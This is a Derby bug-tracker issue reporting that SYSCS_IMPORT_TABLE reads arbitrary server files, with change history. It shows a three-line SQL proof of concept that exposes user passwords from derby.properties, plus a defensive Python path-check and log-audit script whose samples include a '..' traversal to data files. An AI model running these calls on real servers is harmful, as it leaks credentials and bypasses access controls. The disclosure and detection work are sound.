Derby: DERBY-2436

SYSCS_IMPORT_TABLE can be used to read derby files

    Details

    • Urgency:
      Normal
    • Bug behavior facts:
      Regression, Security

      Description

      There are no controls over which files SYSCS_IMPORT_TABLE can read, thus allowing any user that has permission to execute the procedure to try to access information that they have no permission to see. E.g. even with the secure-by-default network server I can execute three lines of SQL to view the contents of derby.properties, thus seeing passwords of other users, or the address of the LDAP server.

      ij> create table t (c varchar(32000));
      ij> CALL SYSCS_UTIL.SYSCS_IMPORT_TABLE(NULL, 'T', 'derby.properties', NULL, NULL, 'ISO8859_1', 0);
      ij> select * from T;
      C
      ----------------------------------------------
      derby.connection.requireAuthentication=true
      derby.authentication.provider=BUILTIN
      derby.user.SA=sapwd
      derby.user.MARY=marypwd

      Also a similar trick could be attempted against the actual data files, allowing a user to attempt to bypass grant/revoke security, especially now that binary data can be exported/imported.
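      As an added illustration (not code from the issue or from Derby itself), the following Python script shows the two controls the description implies are missing: canonicalising the file argument of an import call and confining it to a single import directory, and, as a detective control, scanning statement-log lines for import calls that escape that directory. It assumes a server working directory of /srv/derby (against which relative file names are taken to resolve) and an allowed directory of /srv/derby/import; both paths are assumptions, and the derby.log lines are constructed in the shape produced when derby.language.logStatementText=true. The argument positions used for SYSCS_IMPORT_TABLE and SYSCS_IMPORT_DATA follow their documented parameter lists.

```python
import os
import re
from typing import List, Optional, Tuple

# Assumed deployment layout (not from the issue): the working directory of the
# Derby server process, against which relative file names passed to the import
# procedures are assumed to resolve, and the only directory imports should be
# allowed to read from.
SERVER_WORKING_DIR = "/srv/derby"
ALLOWED_IMPORT_DIR = "/srv/derby/import"

# 0-based position of the file-name argument in each procedure's parameter list:
# SYSCS_IMPORT_TABLE(schema, table, fileName, ...) and
# SYSCS_IMPORT_DATA(schema, table, insertColumns, columnIndexes, fileName, ...).
FILE_ARG_INDEX = {"SYSCS_IMPORT_TABLE": 2, "SYSCS_IMPORT_DATA": 4}

CALL_RE = re.compile(
    r"SYSCS_UTIL\.(SYSCS_IMPORT_TABLE|SYSCS_IMPORT_DATA)\s*\((.*)\)",
    re.IGNORECASE | re.DOTALL,
)
# One SQL argument: a quoted literal ('' escapes a quote), NULL, or an integer.
ARG_RE = re.compile(r"'((?:[^']|'')*)'|(NULL)|(-?\d+)", re.IGNORECASE)


def parse_call(statement: str) -> Optional[Tuple[str, List[Optional[str]]]]:
    """Extract (procedure name, argument list) from an import call, or None if absent."""
    m = CALL_RE.search(statement)
    if not m:
        return None
    args: List[Optional[str]] = []
    for literal, null, number in ARG_RE.findall(m.group(2)):
        if null:
            args.append(None)
        elif number:
            args.append(number)
        else:
            args.append(literal.replace("''", "'"))
    return m.group(1).upper(), args


def file_is_allowed(file_name: str) -> bool:
    """True only if the name canonicalises to a path inside ALLOWED_IMPORT_DIR.

    Canonicalising first defeats '..' segments and symlinks; a plain prefix
    check on the raw string would not.
    """
    resolved = os.path.realpath(os.path.join(SERVER_WORKING_DIR, file_name))
    allowed = os.path.realpath(ALLOWED_IMPORT_DIR)
    return os.path.commonpath([resolved, allowed]) == allowed


def audit_log(lines: List[str]) -> List[dict]:
    """Return one finding per import call whose file lies outside the allowed directory."""
    findings: List[dict] = []
    for lineno, line in enumerate(lines, 1):
        call = parse_call(line)
        if call is None:
            continue
        procedure, args = call
        idx = FILE_ARG_INDEX[procedure]
        file_name = args[idx] if idx < len(args) else None
        if file_name is None or not file_is_allowed(file_name):
            findings.append({"line": lineno, "procedure": procedure, "file": file_name})
    return findings


# Constructed sample lines in the shape derby.log takes when
# derby.language.logStatementText=true (the prefix fields are approximated).
SAMPLE_LOG = [
    "Thread[DRDAConnThread_3,5,main] (XID = 1240), (SESSIONID = 2), (DATABASE = sales), "
    "Executing prepared statement: CALL SYSCS_UTIL.SYSCS_IMPORT_TABLE(NULL, 'ORDERS', "
    "'import/orders.csv', NULL, NULL, 'UTF-8', 0) :End prepared statement",
    "Thread[DRDAConnThread_4,5,main] (XID = 1301), (SESSIONID = 3), (DATABASE = sales), "
    "Executing prepared statement: CALL SYSCS_UTIL.SYSCS_IMPORT_TABLE(NULL, 'T', "
    "'derby.properties', NULL, NULL, 'ISO8859_1', 0) :End prepared statement",
    "Thread[DRDAConnThread_4,5,main] (XID = 1302), (SESSIONID = 3), (DATABASE = sales), "
    "Executing prepared statement: CALL SYSCS_UTIL.SYSCS_IMPORT_DATA(NULL, 'T', NULL, NULL, "
    "'import/../sales/seg0/c10.dat', NULL, NULL, 'ISO8859_1', 0) :End prepared statement",
    "Thread[DRDAConnThread_4,5,main] (XID = 1303), (SESSIONID = 3), (DATABASE = sales), "
    "Executing prepared statement: select * from T :End prepared statement",
]

if __name__ == "__main__":
    for f in audit_log(SAMPLE_LOG):
        print(f"line {f['line']}: {f['procedure']} read {f['file']!r} outside {ALLOWED_IMPORT_DIR}")
```

      The second and third constructed lines are flagged: the first reproduces the derby.properties read from the description, the second reaches for a database data file under seg0 through a '..' segment, which the raw-string prefix check many implementations use would let through. The orders.csv import inside the allowed directory passes.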

        Issue Links

          This issue relates to DERBY-2437

          Activity

          Changes are listed as Field: Original Value -> New Value (original omitted where the field was empty).

          Daniel John Debrunner created issue
          Daniel John Debrunner made changes:
            Affects Version/s: 10.3.1.0 [12312541]
            Affects Version/s: 10.3.0.0 [12310800]
          Kathey Marsden made changes:
            Affects Version/s: 10.1.2.1 [12310615]
            Affects Version/s: 10.2.1.6 [11187]
            Urgency: Urgent
            Affects Version/s: 10.3.0.0 [12310800]
          Kathey Marsden made changes:
            Derby Info: [Regression]
          Dag H. Wanvik made changes:
            Link: This issue relates to DERBY-2437 [DERBY-2437]
          Dag H. Wanvik made changes:
            Derby Categories: [Security]
          Dag H. Wanvik made changes:
            Component/s: Security [11411]
          Dag H. Wanvik made changes:
            Component/s: Tools [11414]
          Dag H. Wanvik made changes:
            Bug behavior facts: [Security] -> [Regression]
          Dag H. Wanvik made changes:
            Bug behavior facts: [Regression] -> [Regression, Security]
          Kathey Marsden made changes:
            Urgency: Urgent -> Normal
            Issue & fix info: [High Value Fix]
          Kathey Marsden made changes:
            Labels: derby_triage10_5_2
          Kathey Marsden made changes:
            Labels: derby_triage10_5_2 -> derby_triage10_10 derby_triage10_5_2
            Issue & fix info: High Value Fix [10422]
          Gavin made changes:
            Workflow: jira [12399210] -> Default workflow, editable Closed status [12802010]

            People

            • Assignee:
              Unassigned
            • Reporter:
              Daniel John Debrunner
            • Votes:
              1
            • Watchers:
              1